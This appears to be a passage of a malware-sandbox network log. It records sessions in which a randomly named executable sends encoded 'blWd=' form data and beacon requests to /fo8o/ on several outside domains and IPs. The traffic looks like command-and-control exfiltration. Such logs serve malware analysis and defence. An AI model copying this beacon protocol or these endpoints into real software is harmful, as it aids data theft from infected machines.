            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 69 31 55 77 34 49 32 58 75 43 48 37 6d 35 73 61 4e 51 5a 43 68 4c 45 2b 49 67 42 52 2f 6d 6a 2f 4a 7a 78 62 66 34 49 6f 66 65 4f
            Data Ascii: blWd=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCii1Uw4I2XuCH7m5saNQZChLE+IgBR/mj/Jzxbf4IofeO
            Aug 2, 2024 13:52:44.273008108 CEST367INHTTP/1.1 404 Not Found
            Date: Fri, 02 Aug 2024 11:52:44 GMT
            Server: Apache
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            30192.168.2.649760195.110.124.133805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:52:46.090212107 CEST828OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.elettrosistemista.zip
            Origin: http://www.elettrosistemista.zip
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 233
            Referer: http://www.elettrosistemista.zip/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 72 47 2b 4b 34 7a 52 66 6d 4a 39 4a 4c 78 4a 49 30 76 6e 72 37 74 6d 63 54 68 61 35 54 4d 6d 2f 61 58 70 78 52 76 58 56 35 58 67 67 3d 3d
            Data Ascii: blWd=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6QxrG+K4zRfmJ9JLxJI0vnr7tmcTha5TMm/aXpxRvXV5Xgg==
            Aug 2, 2024 13:52:46.775857925 CEST367INHTTP/1.1 404 Not Found
            Date: Fri, 02 Aug 2024 11:52:46 GMT
            Server: Apache
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            31192.168.2.649761195.110.124.133805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:52:48.630045891 CEST1841OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.elettrosistemista.zip
            Origin: http://www.elettrosistemista.zip
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 1245
            Referer: http://www.elettrosistemista.zip/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 71 5a 30 32 56 74 57 4b 45 6d 4a 69 66 2f 6c 61 30 52 55 6f 71 73 39 59 75 50 4b 61 30 34 35 6f 58 44 76 4a 72 39 54 6f 4b 68 32 75 48 2b 75 48 5a 35 5a 30 73 63 30 74 4a 6f 45 30 54 52 4e 30 57 76 70 65 68 41 6a 6e 6c 71 37 46 73 4f 59 46 71 62 54 36 47 39 65 70 54 43 41 32 44 30 2b 48 4f 52 30 2f 61 35 73 62 33 65 54 58 39 46 58 6d 53 30 46 41 37 63 52 76 47 69 43 72 6e 69 79 61 79 78 6a 59 54 77 75 42 64 6d 69 42 56 62 6c 74 6d 7a 6b 6f 59 76 2f 6b 74 6a 34 2b 54 42 6a 65 6b 46 70 [TRUNCATED]
            Data Ascii: blWd=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIMqZ02VtWKEmJif/la0RUoqs9YuPKa045oXDvJr9ToKh2uH+uHZ5Z0sc0tJoE0TRN0WvpehAjnlq7FsOYFqbT6G9epTCA2D0+HOR0/a5sb3eTX9FXmS0FA7cRvGiCrniyayxjYTwuBdmiBVbltmzkoYv/ktj4+TBjekFpdHNzeNHxy9Pcw24vdDItt+e8WTbZ9URuazYWsp568/f0yKCjRfcltj/CA1fR61rMc9wdk4KaradY6Pdc7076uQy+eLO0Q7KYt/TQgmZS3EbjuUCmO3rbsQ1pg9d4mkADNwjYqc53IOT7JXCtaQXK99mv+mn+8LZPNINpu+Qxsl1QHCywTU7xudlwhT8JJRRErNA2xxuNbLuFFABdhBU1HJ7stU7WFTyLLMWe48zP3XOe1lGfqBSFn9lU+mJOWFkDenbEMP2uzR6vx3qmt02agNXgQMf433nniF72arU/+HzfMx3jHkODTNmUud0+TuZwgo8waZmP+Lk5pBsgRWXcZ3Sbk0ZdOcgtB9mqWbW8TV3q2k+2jaWmoHGYnEgXqbQpn9V6ujEY+nrii6iZI3iPk9fxDRDpw02r9pwl7b0gP/uQMCVDbXc8focD0by28eXd4VXTGobiMOnUYVo4z2TFUUFP+aM/5oOhDjlxawgNSNEHkwsgBuyeOrKEXNOhnzk6R0jzAkXvJCu5eMpVQV3ari5ZVVbWHpxc+q1ZKrPTWm5T9YSJR1aNzgCyM/vpEdo39GOX49YKRPj1lUtwqc6YNKe3Bp+KVtkNYcP6JmvgTk0HTczTJZunfRUgRAQjzoxmITZTBJgAFKZjg0Bv8ZGbFgEA1eLCJASFLd [TRUNCATED]
            Aug 2, 2024 13:52:49.336429119 CEST367INHTTP/1.1 404 Not Found
            Date: Fri, 02 Aug 2024 11:52:49 GMT
            Server: Apache
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            32192.168.2.649762195.110.124.133805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:52:51.165463924 CEST532OUTGET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk= HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.elettrosistemista.zip
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Aug 2, 2024 13:52:51.871396065 CEST367INHTTP/1.1 404 Not Found
            Date: Fri, 02 Aug 2024 11:52:51 GMT
            Server: Apache
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            33192.168.2.64976315.197.240.20805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:52:57.411190987 CEST798OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.donnavariedades.com
            Origin: http://www.donnavariedades.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 209
            Referer: http://www.donnavariedades.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 48 2b 6f 2f 67 47 49 7a 48 36 46 62 6c 68 36 44 37 74 4b 38 34 6c 70 7a 4d 43 52 30 78 63 75 62 75 42 75 42 77 68 55 38 72 79 4d 52 76 6a 32 35 57 55 30 58 39 66 32 77 62 51 64 6b 55 78 6c 43 4c 34 38 74 5a 65 6f 73 63 7a 2f 66 53 33 64 48 74 49 56 2f 6a 68 35 64 52 72 64 57 45 5a 4f 32 78 52 6f 55 44 34 72 66 58 55 68 54 2f 51 58 43 45 34 59 55 72 49 44 69 49 6d 7a 78 4a 65 67 30 37 31 48 64 44 6a 70 2f 78 39 47 31 6a 4e 38 33 4d 41 48 44 70 49 35 67 38 45 2f 39 70 39 35 6e 63 76 6d 35 51 55 38 4a 4f 34 30 59 59 6f 38 35 5a 77 34 37 77 67 71 75 79 7a 5a 64 73 79 66 74
            Data Ascii: blWd=o8fU2tjVRDgWH+o/gGIzH6Fblh6D7tK84lpzMCR0xcubuBuBwhU8ryMRvj25WU0X9f2wbQdkUxlCL48tZeoscz/fS3dHtIV/jh5dRrdWEZO2xRoUD4rfXUhT/QXCE4YUrIDiImzxJeg071HdDjp/x9G1jN83MAHDpI5g8E/9p95ncvm5QU8JO40YYo85Zw47wgquyzZdsyft


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            34192.168.2.64976415.197.240.20805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:52:59.943882942 CEST822OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.donnavariedades.com
            Origin: http://www.donnavariedades.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 233
            Referer: http://www.donnavariedades.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 42 75 59 2f 6a 6c 77 7a 41 61 46 63 37 52 36 44 77 4e 4c 33 34 6c 6c 7a 4d 44 6b 76 78 71 2b 62 76 67 65 42 68 51 55 38 71 79 4d 52 6e 44 33 7a 63 30 30 59 39 66 71 34 62 55 5a 6b 55 31 4e 43 4c 35 4d 74 5a 4e 41 76 63 6a 2f 64 48 6e 64 46 79 59 56 2f 6a 68 35 64 52 72 4a 38 45 5a 57 32 78 46 73 55 43 5a 72 63 4c 45 68 51 38 51 58 43 41 34 59 51 72 49 44 4d 49 69 71 61 4a 61 51 30 37 30 33 64 44 33 64 34 36 39 47 2f 74 74 39 61 66 44 2b 4f 6c 2b 67 45 79 58 58 47 38 2f 70 51 55 35 6e 6a 4d 6e 38 71 63 6f 55 61 59 71 6b 4c 5a 51 34 52 79 67 53 75 67 6b 56 36 6a 47 36 4f 6d 69 6f 6b 53 65 55 43 6f 42 5a 58 7a 6e 55 52 42 77 46 63 4f 41 3d 3d
            Data Ascii: blWd=o8fU2tjVRDgWBuY/jlwzAaFc7R6DwNL34llzMDkvxq+bvgeBhQU8qyMRnD3zc00Y9fq4bUZkU1NCL5MtZNAvcj/dHndFyYV/jh5dRrJ8EZW2xFsUCZrcLEhQ8QXCA4YQrIDMIiqaJaQ0703dD3d469G/tt9afD+Ol+gEyXXG8/pQU5njMn8qcoUaYqkLZQ4RygSugkV6jG6OmiokSeUCoBZXznURBwFcOA==


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            35192.168.2.64976515.197.240.20805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:53:02.474021912 CEST1835OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.donnavariedades.com
            Origin: http://www.donnavariedades.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 1245
            Referer: http://www.donnavariedades.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 42 75 59 2f 6a 6c 77 7a 41 61 46 63 37 52 36 44 77 4e 4c 33 34 6c 6c 7a 4d 44 6b 76 78 71 32 62 75 57 4b 42 77 44 4d 38 34 69 4d 52 6d 44 33 77 63 30 30 2f 39 66 69 38 62 52 41 52 55 7a 4a 43 4a 62 45 74 4d 4d 41 76 53 6a 2f 64 59 58 64 47 74 49 55 72 6a 68 4a 5a 52 72 5a 38 45 5a 57 32 78 44 41 55 46 49 72 63 4a 45 68 54 2f 51 58 30 45 34 5a 31 72 49 62 36 49 69 6e 68 49 70 59 30 31 33 66 64 41 43 70 34 6d 74 47 78 67 4e 39 43 66 43 44 4f 6c 36 49 6d 79 57 6a 67 38 2f 4e 51 43 65 61 4b 50 46 6f 58 4a 72 49 32 59 5a 45 2b 43 47 30 56 38 6a 75 47 70 6e 51 50 39 55 6d 6d 39 47 6b 54 47 4d 4e 75 6f 42 35 5a 34 57 55 66 58 41 41 44 64 48 6e 4e 47 2b 62 57 39 71 43 2b 4d 35 46 79 33 72 65 72 30 4b 67 54 48 56 47 63 33 32 68 30 6a 56 33 70 44 55 67 69 67 74 65 55 32 2b 77 6e 4d 46 36 70 6b 47 77 69 58 50 4d 56 73 6e 66 7a 45 64 69 48 7a 62 38 74 4a 33 6c 59 4f 2b 74 34 4d 4d 54 78 76 37 49 4f 43 50 59 77 71 42 4d 76 6b 4d 34 61 34 4e 57 79 66 4e 79 4c 55 [TRUNCATED]
            Data Ascii: blWd=o8fU2tjVRDgWBuY/jlwzAaFc7R6DwNL34llzMDkvxq2buWKBwDM84iMRmD3wc00/9fi8bRARUzJCJbEtMMAvSj/dYXdGtIUrjhJZRrZ8EZW2xDAUFIrcJEhT/QX0E4Z1rIb6IinhIpY013fdACp4mtGxgN9CfCDOl6ImyWjg8/NQCeaKPFoXJrI2YZE+CG0V8juGpnQP9Umm9GkTGMNuoB5Z4WUfXAADdHnNG+bW9qC+M5Fy3rer0KgTHVGc32h0jV3pDUgigteU2+wnMF6pkGwiXPMVsnfzEdiHzb8tJ3lYO+t4MMTxv7IOCPYwqBMvkM4a4NWyfNyLUo3daVh963mW3GTg3u4mSS2ECnzTs/FrMzIyRxPgiE+/3MxguOZra2PFuuiPpvLORb2gBCWu7kBJlhECqd9P2zpqBr1sQHFR1rJzr+CHFjbM5xGnvyFoCenp6+Nv/ulEJDdsjNR5MfmLdk1aQNGJiVvIJQH43+2rtb0Z97HNL8AnaIwb94+dipdj+xLgE+IGsdJI5vENcGD+3I+x4o6fRklMLazVz33QU6UIXt3sq3CpyvbX/033E4TB19ZKyvvWensIPjg//22mA1QKxA0cKncQQyiU9ZiQya9T0eYl9ikuNAvpepGd+bgL3mKOu7LpnEowAp1WJ1vrxVXFI8CaVD3oN48hfr0SATtF3oiL7LNxCb8ay72SZt7H0UlynJrsHFPAI25eQ6ZJzUMGNc9F5iE9ShzmbksHkq516/uiveVVsPs1FegxAD8Rm6yFT62yDRNcaevLNBMQZPzqcgbHe48A5cin9qXvMrPAeJcpXGNmcLR7h8KUcq/Ar82nnIAlIViTmYayBmiqnxdSaamLN3L5LbNiFSA6e8xORc+gsguK6LPQh5hFcNIBom91svWqpwib76a3xJDlY9Dnow6vj2ql9klsFNFPkm2C5mfMj5EeSCfGgddARKUMuFm7HiFRHPvWf3QSG3a6sB4NS6wJQaYSJU7j/SUIf/+ [TRUNCATED]


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            36192.168.2.64976615.197.240.20805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:53:05.004097939 CEST530OUTGET /fo8o/?blWd=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pCTG1dl0n9Zx5sBovXqlibLG+oTQgCZHMA1AF4xfdSZkJv4XAGCI=&Ixe=Apq4tPPXNdTp2 HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.donnavariedades.com
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Aug 2, 2024 13:53:05.501517057 CEST414INHTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 02 Aug 2024 11:53:05 GMT
            Content-Type: text/html
            Content-Length: 274
            Connection: close
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 62 6c 57 64 3d 6c 2b 33 30 31 5a 76 49 54 43 78 61 58 39 41 48 6d 31 59 73 4c 36 35 35 6d 67 4f 54 39 75 66 4a 67 7a 63 74 4f 51 78 32 39 71 53 73 72 78 58 38 6b 77 34 39 79 6b 67 6d 75 6d 69 59 59 55 34 32 78 4d 47 78 56 69 67 35 4b 56 5a 72 4a 6f 73 50 62 73 39 70 43 54 47 31 64 6c 30 6e 39 5a 78 35 73 42 6f 76 58 71 6c 69 62 4c 47 2b 6f 54 51 67 43 5a 48 4d 41 31 41 46 34 78 66 64 53 5a 6b 4a 76 34 58 41 47 43 49 3d 26 49 78 65 3d 41 70 71 34 74 50 50 58 4e 64 54 70 32 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?blWd=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pCTG1dl0n9Zx5sBovXqlibLG+oTQgCZHMA1AF4xfdSZkJv4XAGCI=&Ixe=Apq4tPPXNdTp2"}</script></head></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            37192.168.2.649767217.196.55.202805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:53:19.022710085 CEST792OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.empowermedeco.com
            Origin: http://www.empowermedeco.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 209
            Referer: http://www.empowermedeco.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
